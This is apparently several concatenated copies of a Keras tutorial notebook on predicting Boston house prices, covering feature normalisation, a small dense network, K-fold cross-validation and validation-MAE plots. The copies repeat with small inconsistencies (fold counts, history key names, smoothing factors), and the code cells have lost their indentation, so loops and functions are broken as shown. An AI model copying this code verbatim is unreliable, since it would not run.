We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, an MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average.

Validating our approach using K-fold validation

To evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (about 100 examples). As a consequence, our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training: the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.

The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model is then the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:

* Omit the first 10 data points, which are on a different scale from the rest of the curve.
* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.

Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
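###Markdown
The 80-epoch cutoff used above was read off the validation curve by hand; Keras can also stop training automatically once the validation loss stops improving, via the `EarlyStopping` callback. An optional sketch (the `patience` value is an arbitrary choice), not part of the original notebook:
###Code
from keras.callbacks import EarlyStopping
# Stops training once val_loss has not improved for 10 consecutive epochs.
early_stop = EarlyStopping(monitor='val_loss', patience=10)
# Example usage inside a fold:
# model.fit(partial_train_data, partial_train_targets,
#           validation_data=(val_data, val_targets),
#           epochs=500, batch_size=1, verbose=0, callbacks=[early_stop])
###Output
_____no_output_____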
###Markdown
Predicting house prices: a regression example

This notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.

----

In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label for an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.

Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm.

The Boston Housing Price dataset

We will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.

The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance, some values are proportions, which take values between 0 and 1; others take values between 1 and 12; others between 0 and 100...

Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features, as follows:

1. Per capita crime rate.
2. Proportion of residential land zoned for lots over 25,000 square feet.
3. Proportion of non-retail business acres per town.
4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).
5. Nitric oxides concentration (parts per 10 million).
6. Average number of rooms per dwelling.
7. Proportion of owner-occupied units built prior to 1940.
8. Weighted distances to five Boston employment centres.
9. Index of accessibility to radial highways.
10. Full-value property-tax rate per $10,000.
11. Pupil-teacher ratio by town.
12. 1000 * (Bk - 0.63) ** 2, where Bk is the proportion of Black people by town.
13. % lower status of the population.

The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
import numpy as np
np.max(train_targets)
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted.

Preparing the data

It would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
a = np.array([[[1, 2], [3, 4]],
[[1, 2], [3, 4]]])
np.mean(a, axis=2)
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization.

Building our network

Because so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit and no activation (i.e. it will be a linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance, if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.

Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.

We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, an MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average.

Validating our approach using K-fold validation

To evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (about 100 examples). As a consequence, our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training: the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.

The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model is then the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
# Quick scratch check of how np.concatenate joins arrays, used below to assemble the fold data
np.concatenate(([1, 2], [3, 4]))
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
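###Markdown
The fold slicing above is done by hand with array indexing. As a hedged alternative sketch (assuming scikit-learn is available in this environment), `sklearn.model_selection.KFold` with `shuffle=False` yields essentially the same contiguous partitions:
###Code
from sklearn.model_selection import KFold
kf = KFold(n_splits=k, shuffle=False)   # contiguous folds, like the manual slicing above
kfold_scores = []
for fold, (train_idx, val_idx) in enumerate(kf.split(train_data)):
    print('processing fold #', fold)
    model = build_model()
    model.fit(train_data[train_idx], train_targets[train_idx],
              epochs=num_epochs, batch_size=1, verbose=0)
    _, fold_mae = model.evaluate(train_data[val_idx], train_targets[val_idx], verbose=0)
    kfold_scores.append(fold_mae)
print(np.mean(kfold_scores))
###Output
_____no_output_____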
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
# Sanity check: each fold's history holds one validation MAE per epoch
len(all_mae_histories[0])
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
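###Markdown
As a small aside (a sketch that assumes every fold ran for the full `num_epochs`), the same per-epoch average can be computed in a single vectorized call by stacking the histories into a `(k, num_epochs)` array:
###Code
average_mae_history_vec = np.mean(np.array(all_mae_histories), axis=0)
# Should agree with the list comprehension above, up to floating-point noise.
print(np.allclose(average_mae_history_vec, average_mae_history))
###Output
_____no_output_____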
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.99):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
np.argmin(smooth_mae_history)
###Output
_____no_output_____
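###Markdown
`smooth_curve` is a hand-rolled exponential moving average. For reference, a rough equivalent sketch with pandas (an assumption; pandas is not otherwise used in this notebook) sets `alpha = 1 - factor` and `adjust=False` to reproduce the same recursion:
###Code
import pandas as pd
# factor=0.99 above corresponds to alpha=0.01 here; adjust=False matches
# smoothed = previous * factor + point * (1 - factor).
smooth_ewm = pd.Series(average_mae_history[10:]).ewm(alpha=0.01, adjust=False).mean()
plt.plot(range(1, len(smooth_ewm) + 1), smooth_ewm)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE (EWM-smoothed)')
plt.show()
###Output
_____no_output_____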
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
          # +10 accounts for the first 10 epochs dropped before smoothing, +1 turns the index into an epoch count
          epochs=np.argmin(smooth_mae_history) + 10 + 1, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
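###Markdown
Choosing the epoch count from the smoothed curve works, but Keras can also stop training automatically once the validation score stops improving. A hedged sketch using the `EarlyStopping` callback with a simple held-out split instead of the K-fold loop (`restore_best_weights` requires a reasonably recent Keras release):
###Code
from keras.callbacks import EarlyStopping
model = build_model()
early_stop = EarlyStopping(monitor='val_loss', patience=20, restore_best_weights=True)
model.fit(train_data, train_targets,
          validation_split=0.2,   # hold out 20% of the training data for validation
          epochs=500, batch_size=16, verbose=0,
          callbacks=[early_stop])
model.evaluate(test_data, test_targets, verbose=0)
###Output
_____no_output_____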
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
train_data[0]
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets[:10]
###Output
_____no_output_____
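###Markdown
A quick sanity check of the price range mentioned below (a small sketch, not in the original text); the targets are in thousands of dollars:
###Code
print('min:', train_targets.min(),
      'max:', train_targets.max(),
      'mean:', round(train_targets.mean(), 1))
###Output
_____no_output_____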
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
mean
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
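###Markdown
To inspect the resulting architecture and parameter count, one can instantiate the model and print its summary (a small sketch; the exact numbers depend on `train_data.shape[1]`, which is 13 for this dataset):
###Code
build_model().summary()   # two Dense(64) hidden layers followed by a single linear output unit
###Output
_____no_output_____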
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 2
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
%%time
from keras import backend as K
# Some memory clean-up
K.clear_session()
#%%time
import numpy as np
num_epochs = 500
all_mae_histories = []
k = 2
num_val_samples = len(train_data) // k
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mae']
all_mae_histories.append(mae_history)
history.history.keys()
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression example* The previous examples were __classification__ problems, where the goal was to predict a single discrete label of an input data point. * This problem is __"regression"__, which consists of predicting a continuous value instead of a discrete label. > * For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.* __NOTE:__ Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price dataset* We will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.* The dataset has an interesting difference from previous examples: it has very few data points> * Only 506 data points in total> * Split between 404 training samples and 102 test samples> * Each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. >> * For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \\$10,000 and \\$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the data* It would be problematic to feed into a neural network values that all take wildly different ranges. > * The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. * A widespread best practice to deal with such data is to do `feature-wise normalization`: > * For each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation> * The feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
* __Note:__ The quantities that we use for normalizing the test data have been computed using the training data. * __Best Practice:__ never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our network* Because so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. * In general, the less training data you have, the worse overfitting will be> * Using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Understanding the Network* The network ends with a single unit, and no activation (i.e. it will be linear layer)* This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). > * Applying an activation function would constrain the range that the output can take> * for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. > * As the last layer is purely linear, the network is free to learn to predict values in any range.* Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.* We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. > * It is the absolute value of the difference between the predictions and the targets. > * For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \\$500 on average. Validating our approach using K-fold validation* To evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a __training__ set and a __validation__ set, as we were doing in our previous examples. * Because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). * A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, > * i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.* __Best practice__ in such situations is to use K-fold cross-validation. > * It consists of splitting the available data into K partitions (typically K=4 or 5)> * Then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. > * The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
* The different runs do indeed show rather different validation scores, from 2.1 to 2.9. * Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. * In this case, we are off by \\$2,400 on average, which is still significant considering that the prices range from \\$10,000 to \\$50,000. * Next try training the network for a bit longer: 500 epochs. * To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
